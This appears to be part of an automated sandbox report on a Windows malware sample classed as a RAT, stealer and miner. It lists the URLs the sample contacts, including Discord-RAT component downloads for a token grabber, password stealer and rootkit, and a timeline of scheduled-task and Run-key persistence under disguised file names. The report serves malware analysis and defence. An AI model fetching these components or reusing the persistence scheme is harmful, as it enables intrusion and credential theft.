https://oneget.orgX	powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmp	false
http://cacerts.digicert.coa	hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	RuntimeBroker.exe, 00000007.00000002.1769750613.0000010D2EE3C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1933446910.0000016BB36FC000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp	false
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmp	false
https://geolocation-db.com/json	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	false
https://sectigo.com/CPS0	based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
http://cacerts.digicert.coS	RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000001.00000002.1795294245.000001F5BD423000.00000004.00000800.00020000.00000000.sdmp	false
http://ocsp.thawte.com0	based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	false
https://json.org	based.exe, 00000011.00000003.1831935901.000002A15D886000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/dev/peps/pep-0205/	RuntimeBroker.exe, 00000005.00000003.1724634863.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1788254823.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1790570421.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1816671465.000002A15D8CD000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
https://twitter.com/	based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp	false
https://discord.com/api/v9/channels/	RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	based.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1904680044.000002A15E07E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E080000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E080000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefox	based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/	based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp	false
http://www.google.com/maps/place/	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	false
https://google.com/mail/	based.exe, 00000011.00000003.1969462146.000002A15DB94000.00000004.00000020.00020000.00000000.sdmp	false
https://file.io/	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	false
https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll	87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	false
https://www.openssl.org/H	based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail	based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org	based.exe, 00000011.00000003.1929116625.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	hacn.exe, 00000012.00000003.1828089329.0000016BB1AE9000.00000004.00000020.00020000.00000000.sdmp	false
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);	based.exe, 00000011.00000003.1818177199.000002A15D874000.00000004.00000020.00020000.00000000.sdmp	false
https://gateway.discord.gg	RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4N	hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp	false
https://oneget.org	powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	based.exe, 00000011.00000003.1876089664.000002A15E023000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E023000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.130.234	gateway.discord.gg	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1485949
Start date and time:	2024-08-01 10:56:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	98
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	87Bym0x4Fy.exe renamed because original name is a hash value
Original Sample Name:	7AA4185295AB3F4F896704AED05C0795.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@150/148@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 142.250.185.131, 20.114.59.183, 20.166.126.56, 20.189.173.22, 20.242.39.171
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target RuntimeBroker2.0.exe, PID 7176 because it is empty
Execution Graph export aborted for target hacn.exe, PID 7772 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6232 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7068 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:57:09	API Interceptor	225x Sleep call for process: powershell.exe modified
04:57:26	API Interceptor	1x Sleep call for process: setup.exe modified
04:57:27	API Interceptor	2x Sleep call for process: SIHClient.exe modified
04:57:29	API Interceptor	1x Sleep call for process: WMIC.exe modified
04:57:33	API Interceptor	1x Sleep call for process: WerFault.exe modified
04:58:19	API Interceptor	27785x Sleep call for process: cmd.exe modified
04:58:19	API Interceptor	44248x Sleep call for process: based.exe modified
04:58:19	API Interceptor	69941x Sleep call for process: conhost.exe modified
04:58:19	API Interceptor	3144x Sleep call for process: svchost.exe modified
09:57:40	Task Scheduler	Run new task: cscript path: "C:\Users\user\cscript.exe"
09:57:40	Task Scheduler	Run new task: cscriptc path: "C:\Users\user\cscript.exe"
09:57:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cscript "C:\Users\user\cscript.exe"
09:57:43	Task Scheduler	Run new task: cmd path: "C:\Program Files\Uninstall Information\cmd.exe"
09:57:44	Task Scheduler	Run new task: cmdc path: "C:\Program Files\Uninstall Information\cmd.exe"
09:57:44	Task Scheduler	Run new task: dasHost path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
09:57:44	Task Scheduler	Run new task: dasHostd path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
09:57:44	Task Scheduler	Run new task: powershell path: "C:\Users\user\NetHood\powershell.exe"
09:57:44	Task Scheduler	Run new task: powershellp path: "C:\Users\user\NetHood\powershell.exe"
09:57:44	Task Scheduler	Run new task: RKjtGQcyio path: "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
09:57:44	Task Scheduler	Run new task: RKjtGQcyioR path: "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
09:57:47	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
09:57:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"
09:58:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
09:58:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Program Files\Uninstall Information\cmd.exe"
09:58:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
09:58:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cscript "C:\Users\user\cscript.exe"
09:58:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"
09:58:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
09:59:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Program Files\Uninstall Information\cmd.exe"
09:59:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
09:59:20	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run cscript "C:\Users\user\cscript.exe"
09:59:28	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"
09:59:37	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
09:59:45	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Program Files\Uninstall Information\cmd.exe"

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (962), with no line terminators
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.907918982685397
Encrypted:	false
SSDEEP:	24:dejlkSoPPOXVXvy/oe+sSm/Oc1cJMaZLZrihC9j966T0M9naAKbdzIkC8G:QJkSSwvy/T1+mC9j9MO40kG
MD5:	1D4EDB9E4C6548904258A5402089DB09
SHA1:	5D934E664F95C2A8CC46A869735E80CBDEBF3098
SHA-256:	622D1FDBDC888324773692E7EF09682B58EA182E1D5EDC707835039E74F6C511
SHA-512:	0C90E42E9A04C1B1FD7F009B5215DE1909D1BA8BD786959CCC513D8D5A5845521C7665C29E535EADEE5436BD37BD87560B947660C019B4E2820ECEB0FCD53653
Malicious:	false
Reputation:	unknown
